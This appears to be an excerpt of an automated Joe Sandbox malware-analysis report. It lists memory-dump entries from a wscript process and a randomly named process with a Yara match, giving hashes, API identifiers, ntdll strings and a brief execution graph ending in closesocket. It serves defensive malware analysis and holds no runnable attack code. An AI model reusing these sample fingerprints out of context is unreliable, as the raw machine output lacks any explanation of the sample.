                                                                                                                                                                              • Snapshot File: hcaresult_12_2_4710000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                              • API String ID: 0-3754132690
                                                                                                                                                                              • Opcode ID: 7ab08c4de773a3b8ee34a8063e8ca4aaaa6e64d904a6afb733b2d233b62539be
                                                                                                                                                                              • Instruction ID: 3ceafe3d2a02277f991efedfe0ec4328ca24f4618ba06ebb2f1e414d181f8dd7
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ab08c4de773a3b8ee34a8063e8ca4aaaa6e64d904a6afb733b2d233b62539be
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B9152F04482948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                              • Opcode ID: 9ab06936f4016832785fb738919f294414c29c74ceb271a3eee9addf82a1c787
                                                                                                                                                                              • Instruction ID: 2feacfd2ee8474720c9a308709ec34bf28da19213015ff3d84b1a92fc2b465c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ab06936f4016832785fb738919f294414c29c74ceb271a3eee9addf82a1c787
                                                                                                                                                                              • Instruction Fuzzy Hash: 2451F6B2B00216BFDB10DF98D99097EF7B9BB4A20571086B9E465D7641E334FE40CBA0
                                                                                                                                                                              Strings
                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049646FC
                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04964787
                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04964742
                                                                                                                                                                              • Execute=1, xrefs: 04964713
                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04964725
                                                                                                                                                                              • ExecuteOptions, xrefs: 049646A0
                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04964655
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                                              • Opcode ID: 2561beea877eeff60428e4cee9efd47b95990fbe3481e043d2c8c62d7fbe62a4
                                                                                                                                                                              • Instruction ID: ca8c066cc478c7159b25766998042c9a99167d0f29826498a97c1b76e5acfb42
                                                                                                                                                                              • Opcode Fuzzy Hash: 2561beea877eeff60428e4cee9efd47b95990fbe3481e043d2c8c62d7fbe62a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B5105316012297AEF10AAE4DD89BAA77ADAF84304F0405F9E506BB180EB71BE458F51
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction ID: ee320e65a6e6cfd59f99a083736de34f3c332657c907f728af69e07971abe2f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B81E470E052499EDF248E68C8517FEBBB6EF87326F18453AD852A7693C734B840C751
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049602BD
                                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049602E7
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 0496031E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                                              • Opcode ID: 8c1bca2e10983b8b8b1055e6015c79897cd0d71378dbfca2460916a7a306a6dc
                                                                                                                                                                              • Instruction ID: edaa61597b747f1001a0121c28d947754a46c051b6e7ad47951d96c26bb957b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c1bca2e10983b8b8b1055e6015c79897cd0d71378dbfca2460916a7a306a6dc
                                                                                                                                                                              • Instruction Fuzzy Hash: E9E1AF706087499FD725CF28C884B2AB7E5BF89314F140A7DE5A68B2E1E774F844CB42
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 04967BAC
                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04967B7F
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 04967B8E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                                              • Opcode ID: 87e55aa90446a31732f54dbcc1e0746a2208ab19a213869279e13b9944eec45d
                                                                                                                                                                              • Instruction ID: e168c285c0c8b92d90983d7c15cdbc167af4e73aa7b90a8ec372a8aba6c8b858
                                                                                                                                                                              • Opcode Fuzzy Hash: 87e55aa90446a31732f54dbcc1e0746a2208ab19a213869279e13b9944eec45d
                                                                                                                                                                              • Instruction Fuzzy Hash: DE41D3317457029FD720EE25C940B6AB7E9FF88724F100A3DE95AEB684DB71F4058B91
                                                                                                                                                                              APIs
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0496728C
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04967294
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 049672C1
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 049672A3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                                              • Opcode ID: ae4b380d98197f649a413d7622143a7b83487368914b6ee50c4878a63165aeaa
                                                                                                                                                                              • Instruction ID: 30058571b722ce26d27c3d3dcca91cd7eba588cdf7e47211d10a8bd759438a0a
                                                                                                                                                                              • Opcode Fuzzy Hash: ae4b380d98197f649a413d7622143a7b83487368914b6ee50c4878a63165aeaa
                                                                                                                                                                              • Instruction Fuzzy Hash: 4241D031700616ABE720DE65CD81F6AB7E5FB84718F100A39F956EB244DB21F842DBD1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction ID: 455a610ec5a4374871d4422db22410b0cd4908e9376c20c0df73054a0d55cb9c
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction Fuzzy Hash: 729197B0E402169BDB24DF99C8846BEB7E9FF46322F14C57AF855A72D0E730B9408760
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$@
                                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                                              • Opcode ID: def258a19bf9fe7ad1f9153e205a4deeb9d255fa3c909fcf38402ecbd27f7bb0
                                                                                                                                                                              • Instruction ID: 4f834abd97e870f02ae8e9d211f9a36fad1b1063ef050730f25c7902b6ba3e35
                                                                                                                                                                              • Opcode Fuzzy Hash: def258a19bf9fe7ad1f9153e205a4deeb9d255fa3c909fcf38402ecbd27f7bb0
                                                                                                                                                                              • Instruction Fuzzy Hash: F8812EB1D002699BDB31CF54CC44BEEB7B8AB48714F1045EAE919B7250E7746E85CFA0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:2.3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                              execution_graph 12630 4bfb661 12631 4bfb67b 12630->12631 12632 4bfb68a closesocket 12631->12632

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 9 4bfb661-4bfb698 call 4bd2ce1 call 4bfc271 closesocket
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_13_2_4bb0000_tCyxXhRNgdPI.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: closesocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2781271927-0
                                                                                                                                                                              • Opcode ID: 9b6371fb5e43528a43d6eaaf1feeeb21ad9e5bca3a082b5d88f8e16adbd4370d
                                                                                                                                                                              • Instruction ID: 1df7e1e6affc7a4dc2dc2043bc16f83e9c35ca26b70c96423547b64e261b7cf4
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b6371fb5e43528a43d6eaaf1feeeb21ad9e5bca3a082b5d88f8e16adbd4370d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE086361001047BD614EB99DC40CE7776DEFC5350B004455FE0C67200C671BA1187F0